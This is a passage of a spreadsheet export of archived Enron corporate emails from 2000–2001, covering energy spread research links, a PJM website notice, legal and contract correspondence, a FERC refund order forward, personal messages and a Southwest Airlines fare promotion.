Jan WTI/Brent Spread_x000D_
http://www.carrfut.com/research/Energy1/clf-qof.pdf_x000D_
Jan Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack.pdf_x000D_
Jan Gas Crack     http://www.carrfut.com/research/Energy1/gascrack.pdf_x000D_
Dec/May Heat Spread     http://www.carrfut.com/research/Energy1/hoz-hok.pdf_x000D_
Jan/Feb Heat Spread     http://www.carrfut.com/research/Energy1/hof-hog.pdf_x000D_
Dec Gas/Heat Spread     http://www.carrfut.com/research/Energy1/huz-hoz.pdf_x000D_
Feb Gas/Heat Spread     http://www.carrfut.com/research/Energy1/hug-hog.pdf_x000D_
Dec/Mar Unlead Spread_x000D_
http://www.carrfut.com/research/Energy1/huz-huh.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG43.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG43.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL43.pdf_x000D_
_x000D_
Scott Mollner Recomendation_x000D_
http://www.carrfut.com/research/Energy1/recom11-27-01.pdf</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'owner-pjm-customer-info@pjm.com'})</t>
  </si>
  <si>
    <t>New Buttons for PJM eTools</t>
  </si>
  <si>
    <t>Message sent from the pjm-customer-info mailing list at _x000D_
pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
In response to customer feedback and in order to make our website more user_x000D_
friendly, PJM will add buttons for the more widely used eTools to the PJM home_x000D_
page. The button will be located just under the weather maps and will _x000D_
eliminate_x000D_
the user's need to scroll or make multiple clicks to reach the  suite of PJM_x000D_
eTools.  The entire suite will continue to be accessible via the "Business_x000D_
eTools" link on the navigational bar. The new buttons should be available on_x000D_
Thursday 12/14/00 at approximately 3:00PM._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please DO NOT REPLY to this message. If you have a question for PJM Customer_x000D_
Relations and Training, please complete and submit this form:_x000D_
http://www.pjm.com/contact/questions.html_x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 05:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'david.porter@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'monika.causholli@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'cyril.price@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@enron.com', 'joe.errigo@enron.com', 'stephanie.piwetz@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'jason.crawford@enron.com', 'tanya.rohauer@enron.com', 'ricardo.perez@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'james.terrell@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'john.suttle@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'karen.lambert@enron.com', 'jon.lewis@enron.com', 'erik.serio@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'mitzie.scott@enron.com', 'kim.ward@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'john.suarez@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'rod.nelson@enron.com', 'kevin.cline@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'ted.ballinger@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'jay.wills@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'brent.hebert@enron.com', 'monica.lande@enron.com', 'christopher.smith@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'dave.mangskau@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'leaf.harasin@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'wayne.herndon@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'bill.iii@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'geir.solberg@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>Northern States Power Company</t>
  </si>
  <si>
    <t>NSP has changed their name to Xcel Energy Inc.  Global Counterparty will _x000D_
overlay the NSP record with this new name tomorrow.</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 03:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RUSH GUARANTY</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is that RUSH guaranty Stuart Zisman called about.  We need to get it _x000D_
signed today.  We will also need the Certificate with respect to the _x000D_
incumbency of the officer signing the guaranty.  Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Earl / Laura, if EOG agrees to pay for the EFM do we have the unit available, _x000D_
and could we install it by Friday?  I told them they would have to wire us _x000D_
the funds before we commited to spend anymore money._x000D_
_x000D_
Thanks, Bob</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'marty.sunde@enron.com', 'alan.comnes@enron.com', 'linda.robertson@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'donald.black@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'keith.holst@enron.com', 'robert.badeer@enron.com', 'gordon.savage@enron.com', 'sarah.novosel@enron.com', 'mary.hain@enron.com', 'rick.buy@enron.com', 'stephen.swain@enron.com', 'richard.sanders@enron.com', 'andre.cangucu@enron.com', 'michael.tribolet@enron.com', 'paul.kaufman@enron.com', 'shelia.benke@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com', 'mike.smith@enron.com', 'mark.haedicke@enron.com', 'mike.grigsby@enron.com', 'phillip.allen@enron.com', 'harry.kingerski@enron.com', 'shari.stack@enron.com', 'robert.frank@enron.com', 'steve.hall@enron.com', 'roger.yang@enron.com', 'mark.metts@enron.com', 'wanda.curry@enron.com', 'greg.wolfe@enron.com', 'robert.johnston@enron.com', 'portland.desk@enron.com', 'robert.williams@enron.com', 'vicki.sharp@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'mitchell.taylor@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: California - March 9 Order Addressing Refunds for Jan.	2001_x000D_
 Sales</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mary Hain/HOU/ECT on 03/12/2001 09:00 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Nancy Pickover" &lt;npickover@bracepatt.com&gt;                           _x000D_
03/12/2001 06:26 AM_x000D_
	_x000D_
_x000D_
To: &lt;gfergus@brobeck.com&gt;, &lt;marcie.milner@enron.com&gt;, &lt;mary.hain@enron.com&gt;, _x000D_
&lt;richard.b.sanders@enron.com&gt;, &lt;thane.twiggs@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Fwd: California - March 9 Order Addressing Refunds for Jan. 2001 _x000D_
Sales_x000D_
_x000D_
_x000D_
Date: Fri, 09 Mar 2001 17:56:16 -0600_x000D_
From: "Andrea Settanni" &lt;asettanni@bracepatt.com&gt;_x000D_
Cc: "Nancy Pickover" &lt;npickover@bracepatt.com&gt;, "Ronald Carroll" _x000D_
&lt;rcarroll@bracepatt.com&gt;_x000D_
Subject: Fwd: California - March 9 Order Addressing Refunds for Jan. 2001 _x000D_
Sales_x000D_
Mime-Version: 1.0_x000D_
Content-Type: message/rfc822_x000D_
_x000D_
Date: Fri, 09 Mar 2001 17:53:04 -0600_x000D_
From: "Tracey Bradley" &lt;tbradley@bracepatt.com&gt;_x000D_
Cc: "Andrea Settanni" &lt;asettanni@bracepatt.com&gt;, "Jeffrey Watkiss" _x000D_
&lt;dwatkiss@bracepatt.com&gt;, "Nancy Pickover" &lt;npickover@bracepatt.com&gt;_x000D_
Subject: California - March 9 Order Addressing Refunds for Jan. 2001 Sales_x000D_
Mime-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="=_FBA060D9.87E68C77"_x000D_
_x000D_
Attached is FERC"s Order Directing Sellers to Provide Refunds of Excess _x000D_
Amounts Charged for Certain Electric Energy Sales During January 2001 or, _x000D_
Alternately, to Provide Further Cost or Other Justification for such Charges._x000D_
_x000D_
_x000D_
_x000D_
 - EL00-95-017.pdf_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 09:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">apb said this was a void.  thanks_x000D_
_x000D_
---------------------- Forwarded by Kerri Thompson/Corp/Enron on 04/25/2001 _x000D_
04:45 PM ---------------------------_x000D_
_x000D_
_x000D_
Kerri Thompson_x000D_
04/25/2001 04:40 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
_x000D_
missing deal_x000D_
_x000D_
selling morgan stanley_x000D_
127.00_x000D_
25 mw_x000D_
sp15_x000D_
26th_x000D_
off peak_x000D_
chris_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 05:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">whatever, are you saying that my evite skills aren't up to par?_x000D_
i am planning on going sunday. what time?  i think michael is coming with me._x000D_
_x000D_
everything else is good, i got my year-end review and compensation stuff._x000D_
_x000D_
how about you and the fam?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Danielle Samson &lt;DanielleS@JonesGranger.com&gt; on 02/02/2000 05:30:33 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
_x000D_
I was sick on Sunday, so that wasn't very fun.  I saw the last few minutes_x000D_
of the game, or the whole game for that matter.  I couldn't reply to your_x000D_
evite because it was sent wrong......... sorry.  So, are you still planning_x000D_
on making an appearance on Sunday?  Don't worry, I won't know half of the_x000D_
people either!:-)  how's everything else?_x000D_
  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Sep 2001 13:37:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Reliant Protective Order</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
	Draft of transcribed message from Richard Sanders voice mail (Legal) to Rick Shapiro.  Rick forwarded to Jim Steffes._x000D_
_x000D_
	FYI:_x000D_
_x000D_
	"We have not seen the Reliant Protective Order.  It's only been described to me by their General Counsel.  And in the way it was described it was a document that  we would probably agree to, because there's still some corks(? and provisions over disagreements about the Confidentiality. _x000D_
_x000D_
		So, I'm gonna try to get Mike Kirby to get ahold of it this a.m. in terms of the theme to the Legislators.  The question I've got is why haven't we even been offered that same deal?  It shows clearly that they're trying to isolate us, and that they're treating us differently from everyone else., but I'm not sure how far that goes....."_x000D_
_x000D_
	</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: More stuff</t>
  </si>
  <si>
    <t xml:space="preserve">1.  I haven't seen the paperwork on the name change.  I asked around _x000D_
yesterday, and I have someone checking it out.  Initially going through Corp _x000D_
(vs. ENA) made it a bit more complicated to track down._x000D_
_x000D_
2.  I believe I sent you a form services agreement to review.  I think that _x000D_
the parameters for performing certain services can be captured by way of _x000D_
reference to a named guideline or procedure, or by attachment as an exhibit.  _x000D_
I will resend the email for your easy reference._x000D_
_x000D_
Hope this helps._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Gregg Penman                           09/27/2000 02:28 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: More stuff_x000D_
_x000D_
1-Is there anything left to do to change the name under the LLC agreement to _x000D_
enovate?_x000D_
   2-I am attaching the overview cash protocol that was discussed during our _x000D_
meeting with Treasury, Accounting and Finance.  Who can begin crafting a _x000D_
services agreement around this template?  _x000D_
_x000D_
That's it for this moment._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Creating Worldwide Electronic Trading Form</t>
  </si>
  <si>
    <t>I believe the start-up of click trading is an opportune time to go electronic _x000D_
on all aspects of the drafting and negotiation of master energy contracts and _x000D_
confirmations.  At least one law firm has a  project underway where the goal _x000D_
is to type in the country, the commodity type (including quantity and time) _x000D_
and to have a draft trading contract be the immediate result.  The concept is _x000D_
one of "modular" construction of trading contracts with maximum _x000D_
standardization and minimum differences country to country and commodity to _x000D_
commodity.  I want everyone to be thinking about how this can be _x000D_
accomplished.  I will schedule a meeting on this shortly.</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 04:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lfastow@pdq.net'})</t>
  </si>
  <si>
    <t>Re: Fw: Enron - public collections</t>
  </si>
  <si>
    <t>Lea, _x000D_
_x000D_
You called yesterday.  I am swamped and unavailable.  On Jeff Koons, I am _x000D_
sure that Jeff talked with you last week and he shared his insight from other _x000D_
dealers at your dinner and his comments.  It sounds like we should let him go _x000D_
and not pursue.  I was going to talk with Skilling that day and elected to _x000D_
drop it after that.  See you on Monday._x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 17:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>southwest.com Click 'n Save Specials April 24, 2001</t>
  </si>
  <si>
    <t>Southwest Airlines e-mail update for_x000D_
April 24, 2001_x000D_
_x000D_
****************************************************************_x000D_
Your Freedom to Travel This Week Includes_x000D_
_x000D_
I. Anniversary Markets For $30 Each Way_x000D_
II. southwest.com Click 'n Save(R) Specials_x000D_
III. southwest.com Budget Rent a Car Offer_x000D_
IV. Click 'n Save Subscriber Information_x000D_
_x000D_
********Anniversary Markets For $30 Each Way***********_x000D_
_x000D_
I. This week's Anniversary Specials:_x000D_
_x000D_
Albuquerque, NM_x000D_
 $30  each way to/from El Paso, TX_x000D_
_x000D_
Baltimore Washington Int'l, MD_x000D_
 $30  each way to/from Buffalo, NY_x000D_
_x000D_
Corpus Christi, TX_x000D_
 $30  each way to/from San Antonio, TX_x000D_
_x000D_
Dallas, TX Love Field_x000D_
 $30  each way to/from Little Rock, AR_x000D_
_x000D_
San Diego, CA_x000D_
 $30  each way to/from Tucson, AZ_x000D_
_x000D_
The following restrictions will apply:_x000D_
_x000D_
*Available only at southwest.com_x000D_
*21-day advance purchase_x000D_
*Fares are nonrefundable_x000D_
*Travel May 15, 2001 through September 10, 2001._x000D_
*Purchase beginning April 24, 2001 through_x000D_
 April 26, 2001, midnight Pacific Time._x000D_
_x000D_
Fares do not include a federal excise tax of $2.75_x000D_
that will be imposed on each flight segment of your_x000D_
itinerary. A flight segment is defined as a takeoff and_x000D_
a landing. The fares listed do not include airport-assessed_x000D_
passenger facility charges (PFCs) of up to $18 roundtrip._x000D_
_x000D_
Please visit our Reservations section to reserve the_x000D_
Southwest Airlines 30th Anniversary Specials at_x000D_
http://www.southwest.com/jp/hotfares.shtml?src=30th0424_x000D_
_x000D_
******* southwest.com Click 'n Save Specials********_x000D_
II. In addition to the Anniversary Specials, we have_x000D_
included the traditional southwest.com_x000D_
Click 'n Save Specials._x000D_
_x000D_
Albany, NY_x000D_
 $65 each way to/from Nashville, TN_x000D_
_x000D_
Albuquerque, NM_x000D_
 $63 each way to/from Las Vegas, NV_x000D_
_x000D_
Amarillo, TX_x000D_
 $61 each way to/from Oklahoma City, OK_x000D_
 $63 each way to/from San Antonio, TX_x000D_
_x000D_
Austin, TX_x000D_
 $59 each way to/from Jackson, MS_x000D_
 $51 each way to/from Tulsa, OK_x000D_
_x000D_
Baltimore Washington Int'l, MD_x000D_
 $56 each way to/from Detroit, MI_x000D_
 $56 each way to/from Indianapolis, IN_x000D_
 $66 each way to/from Jacksonville, FL_x000D_
_x000D_
Birmingham, AL_x000D_
 $63 each way to/from Houston, TX Hobby_x000D_
_x000D_
Boise, ID_x000D_
 $37 each way to/from Reno/Tahoe, NV_x000D_
_x000D_
Buffalo, NY_x000D_
 $65 each way to/from Nashville, TN_x000D_
_x000D_
Burbank, CA_x000D_
 $34 each way to/from Las Vegas, NV_x000D_
_x000D_
Chicago, IL Midway_x000D_
 $56 each way to/from Long Island/Islip, NY_x000D_
 $67 each way to/from Manchester, NH_x000D_
 $40 each way to/from Omaha, NE_x000D_
_x000D_
Cleveland, OH_x000D_
 $60 each way to/from Hartford, CT/Springfield, MA_x000D_
_x000D_
Columbus, OH_x000D_
 $63 each way to/from Providence, RI_x000D_
 $63 each way to/from Tampa Bay, FL_x000D_
_x000D_
Corpus Christi, TX_x000D_
 $63 each way to/from Jackson, MS_x000D_
_x000D_
Dallas, TX Love Field_x000D_
 $59 each way to/from Harlingen/Rio Grande Valley, TX_x000D_
 $49 each way to/from New Orleans, LA_x000D_
_x000D_
Detroit, MI_x000D_
 $56 each way to/from Baltimore Washington Int'l, MD_x000D_
_x000D_
El Paso, TX_x000D_
 $58 each way to/from San Antonio, TX_x000D_
_x000D_
Ft. Lauderdale/Hollywood, FL_x000D_
 $52 each way to/from Raleigh-Durham, NC_x000D_
_x000D_
Harlingen/Rio Grande Valley, TX_x000D_
 $59 each way to/from Dallas, TX Love Field_x000D_
_x000D_
Hartford, CT/Springfield, MA_x000D_
 $60 each way to/from Cleveland, OH_x000D_
_x000D_
Houston, TX Bush Intercontinental_x000D_
 $48 each way to/from Lubbock, TX_x000D_
 $53 each way to/from Midland/Odessa, TX_x000D_
_x000D_
Houston, TX Hobby_x000D_
 $63 each way to/from Birmingham, AL_x000D_
 $48 each way to/from Lubbock, TX_x000D_
 $53 each way to/from Midland/Odessa, TX_x000D_
 $41 each way to/from New Orleans, LA_x000D_
_x000D_
Indianapolis, IN_x000D_
 $56 each way to/from Baltimore Washington Int'l, MD_x000D_
_x000D_
Jackson, MS_x000D_
 $59 each way to/from Austin, TX_x000D_
 $63 each way to/from Corpus Christi, TX_x000D_
_x000D_
Jacksonville, FL_x000D_
 $66 each way to/from Baltimore Washington Int'l, MD_x000D_
_x000D_
Kansas City, MO_x000D_
 $50 each way to/from Little Rock, AR_x000D_
 $41 each way to/from Louisville, KY_x000D_
_x000D_
Las Vegas, NV_x000D_
 $63 each way to/from Albuquerque, NM_x000D_
 $34 each way to/from Burbank, CA_x000D_
_x000D_
Little Rock, AR_x000D_
 $50 each way to/from Kansas City, MO_x000D_
_x000D_
Long Island/Islip, NY_x000D_
 $56 each way to/from Chicago, IL Midway_x000D_
_x000D_
Los Angeles, CA_x000D_
 $37 each way to/from San Jose, CA_x000D_
_x000D_
Louisville, KY_x000D_
 $41 each way to/from Kansas City, MO_x000D_
_x000D_
Lubbock, TX_x000D_
 $48 each way to/from Houston, TX Bush Intercontinental_x000D_
 $48 each way to/from Houston, TX Hobby_x000D_
_x000D_
Manchester, NH_x000D_
 $67 each way to/from Chicago, IL Midway_x000D_
_x000D_
Midland/Odessa, TX_x000D_
 $53 each way to/from Houston, TX Bush Intercontinental_x000D_
 $53 each way to/from Houston, TX Hobby_x000D_
_x000D_
Nashville, TN_x000D_
 $65 each way to/from Albany, NY_x000D_
 $65 each way to/from Buffalo, NY_x000D_
 $38 each way to/from New Orleans, LA_x000D_
 $59 each way to/from Orlando, FL_x000D_
_x000D_
New Orleans, LA_x000D_
 $49 each way to/from Dallas, TX Love Field_x000D_
 $41 each way to/from Houston, TX Hobby_x000D_
 $38 each way to/from Nashville, TN_x000D_
_x000D_
Oakland, CA_x000D_
 $37 each way to/from Ontario, CA_x000D_
 $48 each way to/from Seattle/Tacoma, WA_x000D_
_x000D_
Oklahoma City, OK_x000D_
 $61 each way to/from Amarillo, TX_x000D_
_x000D_
Omaha, NE_x000D_
 $40 each way to/from Chicago, IL Midway_x000D_
_x000D_
Ontario, CA_x000D_
 $37 each way to/from Oakland, CA_x000D_
_x000D_
Orlando, FL_x000D_
 $59 each way to/from Nashville, TN_x000D_
_x000D_
Phoenix, AZ_x000D_
 $34 each way to/from San Diego, CA_x000D_
 $58 each way to/from San Jose, CA_x000D_
_x000D_
Portland, OR_x000D_
 $56 each way to/from Salt Lake City, UT_x000D_
_x000D_
Providence, RI_x000D_
 $63 each way to/from Columbus, OH_x000D_
_x000D_
Raleigh-Durham, NC_x000D_
 $52 each way to/from Ft. Lauderdale/Hollywood, FL_x000D_
 $51 each way to/from West Palm Beach, FL_x000D_
_x000D_
Reno/Tahoe, NV_x000D_
 $37 each way to/from Boise, ID_x000D_
 $59 each way to/from Tucson, AZ_x000D_
_x000D_
Sacramento, CA_x000D_
 $55 each way to/from Spokane, WA_x000D_
_x000D_
Salt Lake City, UT_x000D_
 $56 each way to/from Portland, OR_x000D_
 $49 each way to/from Spokane, WA_x000D_
_x000D_
San Antonio, TX_x000D_
 $63 each way to/from Amarillo, TX_x000D_
 $58 each way to/from El Paso, TX_x000D_
_x000D_
San Diego, CA_x000D_
 $34 each way to/from Phoenix, AZ_x000D_
_x000D_
San Jose, CA_x000D_
 $37 each way to/from Los Angeles, CA_x000D_
 $58 each way to/from Phoenix, AZ_x000D_
_x000D_
Seattle/Tacoma, WA_x000D_
 $48 each way to/from Oakland, CA_x000D_
_x000D_
Spokane, WA_x000D_
 $55 each way to/from Sacramento, CA_x000D_
 $49 each way to/from Salt Lake City, UT_x000D_
_x000D_
St. Louis, MO_x000D_
 $37 each way to/from Tulsa, OK_x000D_
_x000D_
Tampa Bay, FL_x000D_
 $63 each way to/from Columbus, OH_x000D_
_x000D_
Tucson, AZ_x000D_
 $59 each way to/from Reno/Tahoe, NV_x000D_
_x000D_
Tulsa, OK_x000D_
 $51 each way to/from Austin, TX_x000D_
 $37 each way to/from St. Louis, MO_x000D_
_x000D_
West Palm Beach, FL_x000D_
 $51 each way to/from Raleigh-Durham, NC_x000D_
_x000D_
The following restrictions will apply:_x000D_
_x000D_
*Available only at southwest.com_x000D_
*21-day advance purchase_x000D_
*Fares are nonrefundable_x000D_
*Travel May 15, 2001 through September 10, 2001,_x000D_
 except for May 25 and 28, 2001_x000D_
*Purchase beginning April 24, 2001 through_x000D_
 April 26, 2001, midnight Pacific Time_x000D_
_x000D_
Fares do not include a federal excise tax of $2.75_x000D_
that will be imposed on each flight segment of your_x000D_
itinerary. A flight segment is defined as a takeoff and_x000D_
a landing. The fares listed do not include airport-assessed_x000D_
passenger facility charges (PFCs) of up to $18 roundtrip._x000D_
_x000D_
Please visit our Reservations section to reserve this_x000D_
week's Click 'n Save Specials at_x000D_
http://www.southwest.com/_x000D_
_x000D_
*Scroll down to the Additional Information section for_x000D_
more details or visit:_x000D_
http://www.southwest.com/jp/hotfares.shtml?src=cns0424_x000D_
_x000D_
******** This is the Additional Information section********_x000D_
Additional Information You Need to Know About All_x000D_
of Our Sales:_x000D_
_x000D_
*Changes to any portion of the reservation_x000D_
 (flight, dates, cities, and/or names of passengers),_x000D_
 once purchased, will result in the cancellation of_x000D_
 the ENTIRE reservation and rebooking at the lowest_x000D_
 fare available which could result in a fare increase._x000D_
_x000D_
*Southwest specials are nonchangeable_x000D_
 and nonrefundable._x000D_
*Ticketless Travel Online may only be purchased with_x000D_
 a credit card. Customers holding funds from_x000D_
 a previously unused trip on Southwest Airlines or Customers_x000D_
 who have Southwest Airlines vouchers will not be able to use_x000D_
 those forms of payment for Ticketless Travel Online._x000D_
*Unused funds may be applied toward future travel on_x000D_
 Southwest Airlines within one year of the original purchase date._x000D_
_x000D_
*Seats are limited and won't be available on some_x000D_
 flights that operate during very busy travel times_x000D_
 and holiday periods, such as Memorial weekend_x000D_
 and Independence Day._x000D_
_x000D_
*Standby travel requires an upgrade to the_x000D_
 full unrestricted fare._x000D_
_x000D_
********** southwest.com Budget Rent a Car ************_x000D_
III. Great weekend deals from Budget - as low as $17_x000D_
a day on weekends, with a minimum two day rental._x000D_
At select Southwest cities, you can rent a Budget_x000D_
economy car for as low as $17 a day on weekends,_x000D_
or up to a full-size car for as low as $21a day._x000D_
An additional concession fee may apply at some_x000D_
locations._x000D_
_x000D_
*Enter rate code MD in the Rate Code field on_x000D_
southwest.com_x000D_
*Offer valid on a minimum two consecutive day_x000D_
rental of an economy car_x000D_
*Reservations must be made between April 24 through_x000D_
April 26, 2001, for pick up May 3 through June 23, 2001_x000D_
at participating Budget airport locations where Southwest_x000D_
Airlines flies_x000D_
*Valid only on reservations made through southwest.com_x000D_
_x000D_
Terms and Conditions:_x000D_
_x000D_
*Optional LDW not to exceed $25.99 per day._x000D_
*Check your automobile insurance policy for rental_x000D_
vehicle coverage._x000D_
*Rate requires a two consecutive day minimum rental._x000D_
*Weekend rental begins after noon on Thursday_x000D_
and must be returned by midnight on Monday._x000D_
*Maximum four day rental._x000D_
*Offer subject to vehicle and rate availability._x000D_
*Blackout dates: May 24-26, 2001._x000D_
*Rates may not be combined with any other promotional_x000D_
offer._x000D_
*Taxes, surcharges, refueling, and optional items are extra._x000D_
*Airport concession fee of approximately 10% may be_x000D_
avoided at some locations by not using our shuttle bus_x000D_
or not renting within 24 hours of flight arrival._x000D_
*CA VLF not to exceed $1.98/day is extra._x000D_
*Vehicle must be returned to renting location, except_x000D_
where otherwise permitted.  Local rental and age_x000D_
requirements apply._x000D_
_x000D_
For complete offer details and participating Budget_x000D_
locations, please visit us at:_x000D_
http://www.southwest.com/jp/hotfares.shtml?src=bud162_x000D_
_x000D_
****************** Subscriber Information *******************_x000D_
IV. Please pass this great news on to your friends!_x000D_
To subscribe to Southwest Airlines_x000D_
Click 'n Save E-mail Updates,_x000D_
visit http://www.southwest.com/email/_x000D_
_x000D_
Remember, if you change your Internet service provider,_x000D_
you will need to unsubscribe and re-subscribe in order_x000D_
to continue receiving Click 'n Save email updates._x000D_
Please visit our subscription page at:_x000D_
http://www.southwest.com/email/_x000D_
****************************************************************_x000D_
This is a post only mailing from Southwest Airlines._x000D_
Please do not attempt to respond to this message._x000D_
_x000D_
Copyright 2001 Southwest Airlines Co. All Rights Reserved._x000D_
